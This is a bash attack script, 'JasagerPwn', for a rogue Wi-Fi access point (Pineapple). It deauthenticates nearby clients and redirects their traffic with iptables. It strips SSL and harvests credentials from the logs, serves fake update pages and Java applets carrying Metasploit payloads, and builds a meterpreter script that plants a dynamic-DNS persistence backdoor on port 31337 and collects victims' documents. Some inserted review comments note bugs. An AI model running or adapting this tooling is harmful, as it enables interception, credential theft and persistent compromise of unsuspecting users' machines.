jasagerPwn-1.1-r44
#!/bin/bash
#leg3nd's JasagerPwn Attack - v1.1 - rev44
#ATTACKS - browserPwn - Redirect LAN to Metasploit's auxiliary module browser autoPwn for sessions
# - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.
# - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.
# - Sniffer - Just picks up traffic with no ARP poisoning, and perfect SSL stripping
# - DeAuth - Deauths nearby clients from their APs and tries to make them join yours
#
#Allows control of transparency of all attacks via a built-in bash menu.
# Requires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite
# Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.
#
# Created for and tested with an RTL8187 monitor mode card, and an OpenWrt Fon+ (Pineapple).
# For More Information refer to INSTALL_HOWTO, usage information -h / -?
#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION
# --- Script configuration: adjust to the local WiFi / uplink layout ---
IFACE='usb0'              # uplink (internet gateway) interface: wlan0, eth1, usb0, ppp0, ...
WiFiMODE='0'              # 0/1: the uplink is WiFi, so a DeAuth exclusion is added for it
fonIP='192.168.10.2'      # address of the Fon-facing interface; the 192.168.10.0 subnet is hard-coded
FONIFACE='eth0'           # interface facing the Jasager router
WIFACE='wlan0'            # wireless interface: wlan0, ath0, wifi0
MIFACE='mon0'             # monitor-mode interface used by the attacks
# Macchanger settings - applied to the attack interfaces only.
macMode='set'             # "set" or "random" (case sensitive)
fakeMac='00:e0:f7:99:e1:30'   # MAC used when macMode=set (Cisco Systems, Inc. OUI)
ourAPmac='00:12:CF:A4:92:B1'  # the Pineapple's own MAC, excluded from DeAuth
msfpath='/pentest/exploits/framework3'   # Metasploit location (msf3 directory when not on BT4)
SETpath='/pentest/exploits/SET'          # Social Engineering Toolkit location
DomainName='Networking.com'              # domain name handed out by the DHCP configuration
######################################################################################################################
# Post-exploitation settings: metScript() below builds the meterpreter script that
# collects documents and adds a backdoor; the bundled persistence script supports
# dynamic-DNS tracking (dyndns.org, no-ip, ...).
autoMetScript='0'         # 1 = run the meterpreter persistence script on the victim automatically
Pport='31337'             # persistence backdoor port
PersIP='Your.dyndns.com'  # dynamic-DNS name the backdoor reports to
pwd=$(echo $PWD)          # launch directory, read by metScript()
# Writes SET's "multi_meter.file" (the script SET runs when
# METERPRETER_MULTI_SCRIPT is on; this file turns that setting on only when
# autoMetScript=1, see the -a switch). Any existing file is removed first.
# Reads the globals PersIP, Pport and pwd, plus NOW, which is assigned further
# down the file at top level - this must not be called before that assignment.
function metScript(){
if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi
# EDIT METERPRETER SCRIPT BELOW THIS
echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A
file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files
file_collector -i /tmp/files -l $pwd/collected__$NOW
" > $SETpath/src/program_junk/multi_meter.file
}
####END SCRIPT CONFIG######
#====================================================================================================================
#####################################################################################################################
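# Command-line switches; each overrides one of the configuration defaults above
# (help() lists them). Note that -h, -u and -U call help(), update() and
# Fupdate(), which are defined further down this file: bash only knows a
# function once its definition has been executed, so this loop must run after
# those definitions (or be moved below them) for those switches to work.
# Optstring: -h takes no argument (the original "h:" made getopts demand one,
# and a bare -h only reached help() through the error arm); the literal "?" is
# kept so "-?" is accepted.
while getopts "a:p:i:w:m:s:d:h?uU" OPTIONS; do
  case "${OPTIONS}" in
    a) autoMetScript=$OPTARG ;;   # 0/1: auto-run the meterpreter script
    p) Pport=$OPTARG ;;           # persistence port
    d) WiFiMODE=$OPTARG ;;        # 0/1: uplink is WiFi
    i) IFACE=$OPTARG ;;           # uplink interface
    w) WIFACE=$OPTARG ;;          # wireless interface
    m) macMode=$OPTARG ;;         # set / random
    s) fakeMac=$OPTARG ;;         # MAC to apply (with -m set)
    u) update ;;                  # self-update, then exit
    U) Fupdate ;;                 # update MSF and SET as well, then exit
    h | \?) help ;;               # -h, -? and unknown switches (getopts reports them as "?")
    *) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;;  # not reached in practice; kept as a guard
  esac
done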
#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE
#REQUIRED CHECKS FOR FUNCTIONALITY
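# Runtime state - hard-coded on purpose (the tunables are in the configuration
# block at the top of the file). The interface probes run once here; some are
# repeated at top level after the interfaces are brought up.
version="1.1"
rev="44"
Fwww="/var/www/fakeupdate"   # docroot for the fake-update page
Jwww="/var/www/javapwn"      # docroot for the java-required page
Gwww="/var/www/google"       # docroot for the google look-alike page
# Default gateway: 'route -n' is scanned for a line starting with 0.0.0.0 and
# the second field of the line *after* it is taken (getline) - confirm this
# matches the routing-table layout on the machine this runs on.
gatewayIP=$(route -n | awk '/^0.0.0.0/ {getline; print $2}')
# Interface presence: first word of any ifconfig line containing the name
# (a substring match, so "wlan0" would also pick up "wlan01").
WIFcheck=$(ifconfig | grep "$WIFACE" | awk '{ print $1 }')
IFcheck=$(ifconfig | grep "$IFACE" | awk '{ print $1 }')
# Timestamp used in collected-log file names. %M is minutes; the original
# format used %m, which is the month, so the timestamp never carried the minute.
NOW=$(date +"%b-%d_%H:%M:%S")
sslport="11000"              # local port SSLstrip listens on
SPWD=$(echo $PWD)            # launch directory
javasite="1"                 # 1 = google template, 2 = java-required template (see JavaSite)
sniffing="0"                 # 1 while SSLstrip is running
wasSniffing="0"              # remembers sniffing across ipTableRedirect()
fakeupdate="0"
browserpwn="0"
javaATK="0"
z="1"                        # cleanup() performs its teardown only while z=1
# 4th character of the monitor interface's name as printed by ifconfig ("0" for
# mon0); empty when the interface does not exist. Both are probed the same way.
moncheck=$(ifconfig | grep "$MIFACE" | awk '{print $1}' | cut -b 4)
ATKcheck=$(ifconfig | grep "$MIFACE" | awk '{print $1}' | cut -b 4)
ourIP=$(ifconfig "$FONIFACE" | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
wifiMAC=$(ifconfig "$IFACE" | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]")
# Latest published revision, scraped from the project's SVN trunk listing over
# plain HTTP (no authentication or integrity check). The grep pattern is kept on
# one line: a newline inside it makes grep treat the empty first line as a
# match-everything pattern. The value is only accepted when it is a plain
# integer, because update()/Fupdate() compare it numerically with "$rev";
# anything else is treated as "could not resolve".
googleRev=$(wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "jasager-pwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}')
[[ "$googleRev" =~ ^[0-9]+$ ]] || googleRev=""
trap 'cleanup' 2 # Interrupt - "Ctrl + C"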
#-----------------------------------------------------------------------
function help() {
  # Switch reference, showing the value each setting currently has. Always
  # exits with status 1 so it also terminates option parsing.
  cat <<EOF

(C)opyright 2011 leg3nd @ www.info-s3curity.com
Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]
-p [31337] -a [0/1] -w [interface]
Options:
-a [0/1] : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript
-p [31337] : Auto-Run Scripts persistence Port. Current = $Pport
-i [interface] : Internet Gateway Interface. Current = $IFACE
-w [interface] : WiFi Card Interface. Current = $WIFACE
-d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE
-m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode
-s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac
-u : Update script and its resources from Google Code.
-U : Update script, SET, and Metasploit.
-? / -h : Help Screen and Switches. More Information In top of script.
For Installation, setup, and more information, please reference the INSTALL file or
http://www.hak5.org/forums/index.php?showtopic=19955

EOF
  exit 1
}
# Resets the firewall and installs plain NAT forwarding from the Fon-facing
# interface ($FONIFACE) to the uplink ($IFACE). The six flush/delete commands
# each run in their own xterm, synchronously (no "&"), so they complete in
# order. FORWARD is then opened for established and for new Fon->uplink
# traffic, DNS (udp/53) from the Fon side is DNAT'ed to the gateway found at
# startup when one was found, everything arriving from the Fon side is
# accepted, the uplink masquerades, and the Fon-side address is (re)applied.
# The SSLstrip redirect is commented out here because sslstrip() adds it.
# NOTE(review): `[ $gatewayIP ]` is unquoted, so a value containing whitespace
# (or several lines) breaks the test; the interface names are unquoted too.
function IPTABLES(){
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"
iptables -P FORWARD ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT
if [ $gatewayIP ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP ; fi
iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
#check for sslstrip
#if [ $sniffing -eq 1 ]; then
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
#iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port $sslport
#fi
ifconfig $FONIFACE $fonIP
}
# Flushes the firewall exactly like IPTABLES(), then - if sniffing was on -
# stops the log tail (TAILPID, set by sslstrip()) and SSLstrip, remembering the
# previous state in wasSniffing and clearing sniffing. Afterwards it opens
# FORWARD, masquerades the uplink and DNATs all udp and all tcp arriving on
# $FONIFACE to this host ($fonIP), then re-applies the Fon-side address.
# NOTE(review): the REDIRECT rule carries no protocol or port match, and the
# last PREROUTING rule has no target (-j) at all, so it only counts matching
# packets without changing where they go.
function ipTableRedirect {
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"
sleep 1
if [ $sniffing -eq "1" ] ; then
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
#iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
wasSniffing=$sniffing
sniffing="0"
fi
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP
iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP
iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
iptables --table nat --append PREROUTING --in-interface $FONIFACE
#redirect all traffic to us
#iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT
ifconfig $FONIFACE $fonIP
}
#Script update via google code
# Self-update from the project's Google Code SVN trunk, driven by googleRev
# (scraped at startup) compared with this file's rev. Every path exits; the
# final exit status is 1 even on success, and wget -q hides download failures.
# NOTE(review): all downloads are unauthenticated plain HTTP with no checksum
# or signature check, and several are .exe/.dll files, so anything on the
# network path can substitute them. Several destinations also disagree with
# the directory that is tested for, which look like copy/paste slips: the
# FakeUpdate loop tests ./src/wwwFakeupdate/ but writes to ./www/, the Java
# temp loop writes to ./src/wwwJava instead of its temp/ subdirectory, the
# Google template loop tests $Fwww (not $Gwww) and stores the Google template
# there, and the Google temp loop tests $Gwww/temp/ but writes to $Jwww/temp/.
function update(){
if [ ! $googleRev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
exit 1
elif [ $googleRev -lt $rev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
exit 1
elif [ $googleRev -gt $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
#FakeUpdate
for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
done
#JavaPwn
for Jitems in "index.template" "index.template.plain" ; do
if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
done
for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do
if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
done
#Google
for Gitems in "index.template" ; do
if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
done
for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
done
elif [ $googleRev -eq $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
fi
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
exit 1
}
#Full update including MSF/SET
# Full update: first runs Metasploit's msfupdate and SET's set-update in
# xterms (before the revision check, so they run even when googleRev could
# not be resolved), then repeats the body of update() line for line, with the
# same unauthenticated plain-HTTP downloads, the same mismatched destination
# directories, and the same "exit 1" on success. Calling update() from here
# instead of duplicating it would keep the two in step.
function Fupdate(){
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.."
xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate"
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.."
xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update"
if [ ! $googleRev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
exit 1
elif [ $googleRev -lt $rev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
exit 1
elif [ $googleRev -gt $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
#FakeUpdate
for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
done
#JavaPwn
for Jitems in "index.template" "index.template.plain" ; do
if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
done
for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do
if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
done
#Google
for Gitems in "index.template" ; do
if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
done
for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
done
elif [ $googleRev -eq $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
fi
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
exit 1
}
#Parse that messy SSLstrip.log
# Post-processes sslstrip.log in the current directory against
# cred-collector/definitions.sslstrip (one definition per line: a label and
# three grep terms). Log lines matching all three terms are appended to
# cred-collector/ssl-collection.log, prefixed with the label and trimmed by sed
# to the "$VAL3=" field and the one after it. Does nothing when the log is
# absent. Called from cleanup().
# NOTE(review): VAL2-VAL4 are expanded unquoted into grep and VAL3 is spliced
# into the sed program, so a definition line containing spaces, globs or sed
# metacharacters changes the command instead of being matched literally.
# "/$PWD/..." has a doubled leading slash (harmless); $[...] is obsolete
# arithmetic, $((...)) is the current form.
SSLparse(){
if [ -e "/$PWD/sslstrip.log" ]; then
LOGPATH="/$PWD/sslstrip.log"
DEFS="cred-collector/definitions.sslstrip"
#
NUMLINES=$(cat "$DEFS" | wc -l)
i=1
while [ $i -le $NUMLINES ]; do
VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
if [ "$GREPSTR" ]; then
echo -n "$VAL1" "- " >> /$PWD/cred-collector/ssl-collection.log
echo "$GREPSTR" | \
sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/cred-collector/ssl-collection.log
fi
i=$[$i+1]
done
fi
}
#function for fluid use of both SET templates
# Switches SET's APACHE_DIRECTORY between the google and javapwn docroots
# according to $javasite (1 = google page, only when the config currently
# points at javapwn; 2 = java-required page), rewriting line $SETapacheDIR of
# set_config through a temporary copy that is then moved into place.
# NOTE(review): SETapacheDIR is assigned later at top level; if it is empty
# when this runs the sed command has no line address and the substitution is
# applied to every line of set_config. The set_config paths are unquoted.
function JavaSite(){
GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"`
#1 = google 2 = java required
if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ
sleep 1
mv $SETpath/config/set_configJ $SETpath/config/set_config
elif [ "$javasite" -eq "2" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG
sleep 1
mv $SETpath/config/set_configG $SETpath/config/set_config
fi
}
# Starts SSLstrip: adds a nat PREROUTING rule sending tcp/80 to $sslport, runs
# sslstrip and a "tail -f" of its log in background xterms, records the tail's
# pid in TAILPID (read by ipTableRedirect() and cleanup()) and sets both
# sniffing and wasSniffing to 1. The log file is created first if missing.
# NOTE(review): the REDIRECT rule has no --in-interface match, so unlike the
# rules in IPTABLES()/ipTableRedirect() it is not limited to $FONIFACE and
# also catches port-80 traffic entering on any other interface of this host.
function sslstrip(){
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
sniffing="1"
wasSniffing=$sniffing
}
# SIGINT handler (trap above) and normal exit path. While z=1 it parses the
# SSLstrip log, kills the helper processes (by recorded pid or by name, mostly
# through background xterms), removes generated files, restores every backed-up
# .ORIGINAL file (SET templates and config, dhcpd.conf, resolv.conf), archives
# sslstrip.log under cred-collector/ with the NOW timestamp and finally kills
# every process named jasagerPwn. Always exits 0.
# NOTE(review): `test -e dsniff*` and `[ -e *.png ]` expand the glob before the
# test runs, so with more than one match the test fails with an argument error
# and with none the literal pattern is tested. The rm -rf on the SET template
# dirs uses an unquoted $SETpath. APACHEDIR is computed here but not used.
# Several of the pids killed (DNSID, dsniffID, messageID, AIRDROPID, AIRDUMPID,
# airID, dnsID2, parseID) are not assigned anywhere in this part of the file,
# so an empty value makes the corresponding "kill" a no-op that just errors.
function cleanup() {
echo
echo -e "\e[01;32m[>]\e[00m Cleaning up..."
if [ $z = 1 ]; then
SSLparse && sleep 1
if test -e /tmp/dhcpd.conf; then rm /tmp/dhcpd.conf; fi
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" &
xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" &
#xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop"
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf"
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff"
xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" &
xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" &
#Clean up our cfgs
if test -e dsniff*; then rm dsniff*; fi
if [ -e "/$PWD/dsniff.services" ]; then rm "/$PWD/dsniff.services" ; fi
if [ -e *.png ]; then rm *.png ; fi
if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi
if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi
if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then
mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template"
fi
APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi
if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi
if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi
if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi
if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi
if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi
if test -e sslstrip.log; then mv sslstrip.log /$PWD/cred-collector/$NOW-sslstrip.log; fi
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" &
fi
echo -e "\e[01;36m[~]\e[00m Exiting with elegance.."
exit 0
}
#xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2"
ifconfig $WIFACE up && sleep 1
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`
IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`
ifconfig $FONIFACE $fonIP
#xterm -geometry 0x0+0+0 -e "while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done" &
#make sure our IP doesn't get changed by any DHCP lease..
while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done &
ipID=`echo $!`
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
#check for required interfaces
if [ "$WIFcheck" != "$WIFACE" ]; then
echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0
fi
if [ "$IFcheck" != "$IFACE" ]; then
echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0
fi
#-----------------------------------------------------------------------
clear
echo
echo
echo ' __------__'
echo ' /~ ~\'
echo ' | //^\//^\| Lets get this show on the road!!'
echo " /~~\ || o| |o|:~\ #! JasagerPwn MultiAttack v$version"
echo ' | |6 ||___|_|_||:| / By leg3nd @ info-s3curity.com'
echo " \__. / o \/ / rev$rev"
echo ' | ( O ) [!] Use At your Own Risk [!]'
echo ' /~~~~\ `\ \ /'
echo ' | |~~\ | ) ~------~`\'
echo ' / | | | / ____ /~~~)\'
echo ' (_/ | | | /. | ( |'
echo ' | | | \ / __)/ \'
echo ' \ \ \ \/ /- \ `\'
